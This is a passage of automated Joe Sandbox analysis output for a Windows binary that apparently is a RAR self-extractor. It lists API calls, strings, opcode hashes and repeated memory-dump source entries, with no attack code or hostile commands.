                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                                      • String ID:
                                                                                                      • API String ID: 1247370737-0
                                                                                                      • Opcode ID: a16539796e1591687c699a3ff2c892892dc63ac604519b58dbfdb7f142ce7b5d
                                                                                                      • Instruction ID: 5405956795fabd2b4fa0b3285bd4afa46904c6b288d4a258ab5da6d8cc15a0a7
                                                                                                      • Opcode Fuzzy Hash: a16539796e1591687c699a3ff2c892892dc63ac604519b58dbfdb7f142ce7b5d
                                                                                                      • Instruction Fuzzy Hash: BA4108B240830A9FC710DFA5C8809ABF7F8FF88714F044A2EF69692650E735E549DB56
                                                                                                      APIs
                                                                                                      • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00A1CCE2,00000000,00000000,00000000,00000000,00000000,00A12C4E), ref: 00A1C5AF
                                                                                                      • __fassign.LIBCMT ref: 00A1C62A
                                                                                                      • __fassign.LIBCMT ref: 00A1C645
                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00A1C66B
                                                                                                      • WriteFile.KERNEL32(?,00000000,00000000,00A1CCE2,00000000,?,?,?,?,?,?,?,?,?,00A1CCE2,00000000), ref: 00A1C68A
                                                                                                      • WriteFile.KERNEL32(?,00000000,00000001,00A1CCE2,00000000,?,?,?,?,?,?,?,?,?,00A1CCE2,00000000), ref: 00A1C6C3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 1324828854-0
                                                                                                      • Opcode ID: 3760bf852a222f0bac37b0f8c01779ebf7746f6904214e60bb4487d29cbe7a25
                                                                                                      • Instruction ID: 0b5a3d3ee06f7630c53e61ebc9f49ace28574332517b6bbc4a3e761d0aa583c5
                                                                                                      • Opcode Fuzzy Hash: 3760bf852a222f0bac37b0f8c01779ebf7746f6904214e60bb4487d29cbe7a25
                                                                                                      • Instruction Fuzzy Hash: 4051E1B4E40208AFDB10CFA8D881AEEBBF8FF19310F14411AE951E7291E7709991CF61
                                                                                                      APIs
                                                                                                      • GetTempPathW.KERNEL32(00000800,?), ref: 00A0B0EF
                                                                                                      • _swprintf.LIBCMT ref: 00A0B123
                                                                                                        • Part of subcall function 009F3F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009F3F6E
                                                                                                      • SetDlgItemTextW.USER32(?,00000066,00A33122), ref: 00A0B143
                                                                                                      • _wcschr.LIBVCRUNTIME ref: 00A0B176
                                                                                                      • EndDialog.USER32(?,00000001), ref: 00A0B257
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                                                                                      • String ID: %s%s%u
                                                                                                      • API String ID: 2892007947-1360425832
                                                                                                      • Opcode ID: d8834dda79f40e11dd3c5303c72f67364100c427947bd2cf3dc1a6d2aaf7cba4
                                                                                                      • Instruction ID: 71a842ad61227bb281d31e0c581b2fcd536abcb52e459918513a39ed98637158
                                                                                                      • Opcode Fuzzy Hash: d8834dda79f40e11dd3c5303c72f67364100c427947bd2cf3dc1a6d2aaf7cba4
                                                                                                      • Instruction Fuzzy Hash: F441947291021DAEEF25DBA4ED85EEF77BCEB04300F0041A6F508E6091EB709B858F64
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strlen$_swprintf_wcschr_wcsrchr
                                                                                                      • String ID: %08x
                                                                                                      • API String ID: 1593746830-3682738293
                                                                                                      • Opcode ID: 79f3f00b0fe579d361de5a81fb04c406255f3fbf39be2965d5e51b950dd2bc75
                                                                                                      • Instruction ID: 74c080762fef608a0f1ba1ef48dd123ce97ce0c02759f6b042eb6d8460265aa4
                                                                                                      • Opcode Fuzzy Hash: 79f3f00b0fe579d361de5a81fb04c406255f3fbf39be2965d5e51b950dd2bc75
                                                                                                      • Instruction Fuzzy Hash: 6D41047290835CAAE734E624CE49FBF73DCEB84760F11452AFA4897182E674ED44C361
                                                                                                      APIs
                                                                                                      • ShowWindow.USER32(?,00000000), ref: 00A085B5
                                                                                                      • GetWindowRect.USER32(?,?), ref: 00A085DA
                                                                                                      • ShowWindow.USER32(?,00000005,?), ref: 00A08671
                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00A08679
                                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00A0868F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Show$RectText
                                                                                                      • String ID: RarHtmlClassName
                                                                                                      • API String ID: 3937224194-1658105358
                                                                                                      • Opcode ID: 580aecb41d6fc2fd498909f00dfdb3cc6037825753f36ba0ef8999843995b980
                                                                                                      • Instruction ID: 5a03e28544d298d9f7ab221abb32b919403a513907134e781ed56bdea3686f95
                                                                                                      • Opcode Fuzzy Hash: 580aecb41d6fc2fd498909f00dfdb3cc6037825753f36ba0ef8999843995b980
                                                                                                      • Instruction Fuzzy Hash: 3D31A231100314AFC721DFA8AD48B2BBBADFF58741F004569FD899A192DB35DD12CBA6
                                                                                                      APIs
                                                                                                        • Part of subcall function 00A192D3: _free.LIBCMT ref: 00A192FC
                                                                                                      • _free.LIBCMT ref: 00A1935D
                                                                                                        • Part of subcall function 00A159C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00A19301,?,00000000,?,00000000,?,00A19328,?,00000007,?,?,00A19725,?), ref: 00A159D8
                                                                                                        • Part of subcall function 00A159C2: GetLastError.KERNEL32(?,?,00A19301,?,00000000,?,00000000,?,00A19328,?,00000007,?,?,00A19725,?,?), ref: 00A159EA
                                                                                                      • _free.LIBCMT ref: 00A19368
                                                                                                      • _free.LIBCMT ref: 00A19373
                                                                                                      • _free.LIBCMT ref: 00A193C7
                                                                                                      • _free.LIBCMT ref: 00A193D2
                                                                                                      • _free.LIBCMT ref: 00A193DD
                                                                                                      • _free.LIBCMT ref: 00A193E8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: 79ca16251da02bffb22ec5b04b3bd6bb15c96f5b654e5c829824a9962078a30e
                                                                                                      • Instruction ID: b116be3c5871ac7a258b131d2171b32c223f0d971e519df6ecbf518c144e8450
                                                                                                      • Opcode Fuzzy Hash: 79ca16251da02bffb22ec5b04b3bd6bb15c96f5b654e5c829824a9962078a30e
                                                                                                      • Instruction Fuzzy Hash: FE113D71E41B04FADA20BBB0CE47FCBB7DCAF45714F804815B29EA6092DA75B984C751
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,?,00A10C0B,00A0E662), ref: 00A10C22
                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A10C30
                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A10C49
                                                                                                      • SetLastError.KERNEL32(00000000,?,00A10C0B,00A0E662), ref: 00A10C9B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                      • String ID:
                                                                                                      • API String ID: 3852720340-0
                                                                                                      • Opcode ID: 7f2eff4a176372942434b602a22e41c558c6506571fc8173759bf2d43004c10c
                                                                                                      • Instruction ID: c7b4a426e94891a1fed054c2fdc1bab278e51c371c44356ca39cc65ba714c934
                                                                                                      • Opcode Fuzzy Hash: 7f2eff4a176372942434b602a22e41c558c6506571fc8173759bf2d43004c10c
                                                                                                      • Instruction Fuzzy Hash: 3C01DF323493215EAB3567F86E85DF73A59EB113B5B20033AFA10800E2EEA14CD399C0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                      • API String ID: 0-1718035505
                                                                                                      • Opcode ID: 4ba5e0a6d19663c0ed2c2e0f4083d2d54bd86017ab6dba2c17a0aa0a30c5f021
                                                                                                      • Instruction ID: 80c4e10c94dbf0ed67bd3e33d197669a3978c0305f054115c14206588ff0456a
                                                                                                      • Opcode Fuzzy Hash: 4ba5e0a6d19663c0ed2c2e0f4083d2d54bd86017ab6dba2c17a0aa0a30c5f021
                                                                                                      • Instruction Fuzzy Hash: A001F97AA81235ABDF304FF87CC4AA723849A227713108739E910D31D1E721C84AA7ED
                                                                                                      APIs
                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A000AE
                                                                                                        • Part of subcall function 009FA8E0: GetVersionExW.KERNEL32(?), ref: 009FA905
                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A000D0
                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A000EA
                                                                                                      • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00A000FB
                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A0010B
                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A00117
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Time$File$System$Local$SpecificVersion
                                                                                                      • String ID:
                                                                                                      • API String ID: 2092733347-0
                                                                                                      • Opcode ID: a50cfc504a1d69fbd4c9dd3de557bd85b2fc3c3e95f5d6eac9febed8e1ae54f0
                                                                                                      • Instruction ID: 59bce506651db7650a2a57e14c8326aff4012c6de98392658e14ae570a017362
                                                                                                      • Opcode Fuzzy Hash: a50cfc504a1d69fbd4c9dd3de557bd85b2fc3c3e95f5d6eac9febed8e1ae54f0
                                                                                                      • Instruction Fuzzy Hash: D931D7761083459BC714DFA9D984DABB7F8BF98704F04491EF999C3210E730D549CB66
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _memcmp
                                                                                                      • String ID:
                                                                                                      • API String ID: 2931989736-0
                                                                                                      • Opcode ID: d11e5a1fe068dca96daf38911ef40f0060269d5d8d755d5f4dd5722b6c437ee4
                                                                                                      • Instruction ID: b751b591997e1750ba71dbbf9bf450fb114103127e583b7f6424b1d148607ee2
                                                                                                      • Opcode Fuzzy Hash: d11e5a1fe068dca96daf38911ef40f0060269d5d8d755d5f4dd5722b6c437ee4
                                                                                                      • Instruction Fuzzy Hash: 6F212BB164060EBBD7049B14FC81FB7B7ACAF68798B144938FC4886182F774DD4156D4
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 009FFB07
                                                                                                      • EnterCriticalSection.KERNEL32(00A31E74,00000000,?,?,009FA7C2,?,009FC74B,?,00000000,?,00000001,?,?,?,00A03AFF,?), ref: 009FFB15
                                                                                                      • new.LIBCMT ref: 009FFB35
                                                                                                      • new.LIBCMT ref: 009FFB6B
                                                                                                      • LeaveCriticalSection.KERNEL32(00A31E74,?,009FA7C2,?,009FC74B,?,00000000,?,00000001,?,?,?,00A03AFF,?,00008000,?), ref: 009FFB8B
                                                                                                      • LeaveCriticalSection.KERNEL32(00A31E74,?,009FA7C2,?,009FC74B,?,00000000,?,00000001,?,?,?,00A03AFF,?,00008000,?), ref: 009FFB96
                                                                                                        • Part of subcall function 009FF930: InitializeCriticalSection.KERNEL32(000001A0,00A31E74,00000000,?,?,009FFB88,00000020,?,009FA7C2,?,009FC74B,?,00000000,?,00000001,?), ref: 009FF969
                                                                                                        • Part of subcall function 009FF930: CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,009FA7C2,?,009FC74B,?,00000000,?,00000001,?,?,?,00A03AFF), ref: 009FF973
                                                                                                        • Part of subcall function 009FF930: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,009FA7C2,?,009FC74B,?,00000000,?,00000001,?,?,?,00A03AFF), ref: 009FF983
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalSection$CreateLeave$EnterEventH_prologInitializeSemaphore
                                                                                                      • String ID:
                                                                                                      • API String ID: 3919453512-0
                                                                                                      • Opcode ID: 7c99a55367346e7404525fd6a0d107dc9d7a1d067e530980ff9184b09d7eba60
                                                                                                      • Instruction ID: ac8ff67d1788d5fbb3d46898094abd47b060a141d55af155ab4ac4bfc0f5bdb1
                                                                                                      • Opcode Fuzzy Hash: 7c99a55367346e7404525fd6a0d107dc9d7a1d067e530980ff9184b09d7eba60
                                                                                                      • Instruction Fuzzy Hash: 2C118634A012159BD714DBA8EC25B7D77B8EF89B55F100139F909D73D1DBB58802CB50
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(?,00A2CBE8,00A12674,00A2CBE8,?,?,00A12213,?,?,00A2CBE8), ref: 00A16323
                                                                                                      • _free.LIBCMT ref: 00A16356
                                                                                                      • _free.LIBCMT ref: 00A1637E
                                                                                                      • SetLastError.KERNEL32(00000000,?,00A2CBE8), ref: 00A1638B
                                                                                                      • SetLastError.KERNEL32(00000000,?,00A2CBE8), ref: 00A16397
                                                                                                      • _abort.LIBCMT ref: 00A1639D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                                      • String ID:
                                                                                                      • API String ID: 3160817290-0
                                                                                                      • Opcode ID: 66cda4b25e7098b67d73fe32ce41e08b45b10857dc0dde0808d9e266902f6401
                                                                                                      • Instruction ID: f8afe4dbdec88e66aad64cafd0a4fb4ef603ebbb33dcaf97872e64df43addb96
                                                                                                      • Opcode Fuzzy Hash: 66cda4b25e7098b67d73fe32ce41e08b45b10857dc0dde0808d9e266902f6401
                                                                                                      • Instruction Fuzzy Hash: F7F02D36645B10A7D72167786E0EFEE122B9FD27B2F250124F539D6192EF2188C34251
                                                                                                      APIs
                                                                                                        • Part of subcall function 009F12E7: GetDlgItem.USER32(00000000,00003021), ref: 009F132B
                                                                                                        • Part of subcall function 009F12E7: SetWindowTextW.USER32(00000000,00A202E4), ref: 009F1341
                                                                                                      • EndDialog.USER32(?,00000001), ref: 00A0B86B
                                                                                                      • GetDlgItemTextW.USER32(?,00000066,00000800), ref: 00A0B881
                                                                                                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 00A0B89B
                                                                                                      • SetDlgItemTextW.USER32(?,00000066), ref: 00A0B8A6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemText$DialogWindow
                                                                                                      • String ID: RENAMEDLG
                                                                                                      • API String ID: 445417207-3299779563
                                                                                                      • Opcode ID: 2caa441d62d26f4024d6296dc1335f83c27a546fb24cbb75007682ebd99faab1
                                                                                                      • Instruction ID: bff9d9fee42ebb82d4cac7ee0ef91dc5894903f2809d5465fad6f4afab4aac48
                                                                                                      • Opcode Fuzzy Hash: 2caa441d62d26f4024d6296dc1335f83c27a546fb24cbb75007682ebd99faab1
                                                                                                      • Instruction Fuzzy Hash: 2401B9339502197BE1218BA9BF45F3B776CDF96B41F104425F200B70F0C766980A9772
                                                                                                      APIs
                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A14A90,?,?,00A14A30,?,00A27F68,0000000C,00A14B87,?,00000002), ref: 00A14AFF
                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A14B12
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00A14A90,?,?,00A14A30,?,00A27F68,0000000C,00A14B87,?,00000002,00000000), ref: 00A14B35
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                      • Opcode ID: 1c778d513e4473dc3722c19d0b3d12450c69b162e57dce4cfd6fdaeb53c441d0
                                                                                                      • Instruction ID: e65ca2a3eaa5d11214a6346dd5402dc84e00204bcbd151843126ca0b50a97a82
                                                                                                      • Opcode Fuzzy Hash: 1c778d513e4473dc3722c19d0b3d12450c69b162e57dce4cfd6fdaeb53c441d0
                                                                                                      • Instruction Fuzzy Hash: 5CF03C31A08218BBDB259FE8EC49FAEBFB9EB08711F000174E805A6151DB749982CB95
                                                                                                      APIs
                                                                                                        • Part of subcall function 009FF309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 009FF324
                                                                                                        • Part of subcall function 009FF309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,009FDEC8,Crypt32.dll,?,009FDF4A,?,009FDF2E,?,?,?,?), ref: 009FF346
                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 009FDED4
                                                                                                      • GetProcAddress.KERNEL32(00A31E58,CryptUnprotectMemory), ref: 009FDEE4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
